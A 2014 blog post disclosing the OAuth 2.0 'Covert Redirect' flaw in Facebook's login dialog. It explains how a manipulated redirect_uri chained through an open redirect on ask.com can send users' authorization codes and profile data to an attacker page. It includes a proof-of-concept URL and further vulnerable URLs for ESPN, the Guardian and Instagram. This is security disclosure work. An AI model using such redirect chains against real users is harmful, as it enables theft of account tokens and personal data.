创建博客 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

tetraph.com 的博客

http://www.tetraph.com/blog/

 
 
 

日志

 
 

Hack Facebook Account Based on OAuth 2.0 Covert Redirect Vulnerability (Information Leakage and URL Redirect) ( 攻击脸书 基于 OAuth 2.0 漏洞, 信息泄漏, URL 跳转)  

2014-05-02 22:40:46|  分类: OAuth2.0 漏洞 |  标签: |举报 |字号 订阅

 

 
 
 
 
 

A Covert Redirect vulnerability related to Facebook was found and reported.

Facebook said "Short of forcing every single application on the platform to use a whitelist, which isn't something that can be accomplished in the short term, do you have any recommendations on actions we can take here?"

In my reply, I suggested "For any URL, it has a particular value "&h". If the URL is changed. there is no permission any more. That means the modified URL will not get any "&h". Because it is illegal."

Facebook agreed. "As you mentioned, that's how our Linkshim system works. As I said, that doesn't seem to be a feasible solution for an OAuth endpoint where the URL needs to be provided by a third-party site to arbitrary random users."

 

 

 

Detail:

Facebook's SSO system is susceptible to Attacks. More specifically, the authentication of parameter "&redirct_uri" in SSO system is insufficient. It can be misused to design Open Redirect Attacks to Facebook.

At the same time, it can be used to collect sensitive information of both third-party app and users by using the following parameters,
"&response_type"=sensitive_info,token...
"&scope"=email,user_birthday,user_likes.?..

It increases the likelihood of successful Open Redirect Attacks to third-party websites, too.

The vulnerabilities occurs at page "/dialog/oauth?" with parameter "&redirect_uri", e.g.
https://www.facebook.com/dialog/oauth... [1]

 

 

Before acceptance of third-party application:
When a logged-in Facebook user clicks the URL ([1]) above, he/she will be asked for consent as in whether to allow a third-party website to receive his/her information. If the user clicks OK, he/she will be then redirected to the URL assigned to the parameter "&redirect_uri".

If a user has not logged onto Facebook and clicks the URL ([1]) above, the same situation will happen upon login.

 

After acceptance of third-party application:
A logged-in Facebook user would no longer be asked for consent and could be redirected to a webpage controlled by the attacker when he/she clicks the URL ([1]).

For a user who has not logged in, the attack could still be completed after a pop-up page that prompts him/her to log in.

 

 

 

 

(1) Facebook would normally allow all the URLs that belong to the domain of an authorized third-party website. However, these URLs could be prone to manipulation. For example, the "&redirect_uri" parameter in the URLs is supposed to be set by the third-party websites, but an attacker could change its value to make Attacks.

Hence, a user could be redirected from Facebook to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site unwillingly. This is as if the user is redirected from Facebook directly. The number of Facebook's SSO client websites is so huge that such Attacks could be commonplace.

Before acceptance of the third-party application, Facebook's SSO system makes the redirects appear more trustworthy and could potentially increase the likelihood of successful Open Redirect Attacks of third-party website.

Once the user accepts the application, the attackers could completely bypass Facebook's authentication system and attack more easily.

It might be of Facebook's interest to patch up against such attacks.

 

 
(2) Used one of webpages for the following tests. The webpage is "http://www.tetraph.com/essayjeans/poe.... We can suppose it is malicious and contains code that collect sensitive information of both third-party app and users.

Below is an example of a vulnerable third-party domain:

ask.com

 

Vulnerable URL in this domain:

http://wzap.ask.com/r?t=v&d=im&u=http%3A%2F%2Ftetraph.com

Vulnerable URL from Facebook that is related to ask.com:

https://www.facebook.com/dialog/oauth?client_id=152973104736490&redirect_uri=https%3a%2f%2fsocial.ask.com%2fGS%2fGSLogin.aspx%3fst%3dzNQz0TjIZd42P_zI5MUVw5WtCHw7EDMc1YEjBVuz3bU.&response_type=code&scope=email%2cuser_location%2cuser_birthday&display=popup

 

POC:

https://www.facebook.com/dialog/oauth?client_id=152973104736490&redirect_uri=http%3A%2F%2Fwzus.ask.com%2Fr%3Ft%3Dp%26u%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Fdistance.html%3F&response_type=code&scope=email%2cuser_location%2cuser_birthday&display=popup




(3) The following URLs have the same vulnerabilities.

https://m.facebook.com/dialog/oauth?redirect_uri=http%3A%2F%2Fm.espn.go.com%2Fwireless%2Fconnect&scope=email%2Cuser_birthday%2Cuser_likes&client_id=116656161708917

https://graph.facebook.com/oauth/authorize?client_id=116656161708917&redirect_uri=http://m.espn.go.com/wireless/connect&display=touch&scope=email,user_birthday,user_likes

http://www.facebook.com/dialog/feed?app_id=180444840287&link=http://www.theguardian.com/money/2007/apr/21/creditcards.debt&display=popup&redirect_uri=http://gu-social-share-experiments.theguardian.com&show_error=false&ref=desktop

https://api.instagram.com/oauth/authorize/?client_id=28ad60e4d0b14b5c8bd87099e53feaef&redirect_uri=http%3A%2F%2Ffollowgram.me%2Flogin&response_type=code&scope=likes+comments+relationships&display=touch

Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows

 

 
 
 

Credit:
WANG Jing,  a PhD student in mathematics from Nanyang Technological University. 

http://www.tetraph.com/wangjing/

 
 
 
  评论这张
 
阅读(882)| 评论(1)
推荐 转载

历史上的今天

最近读者

热度

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2014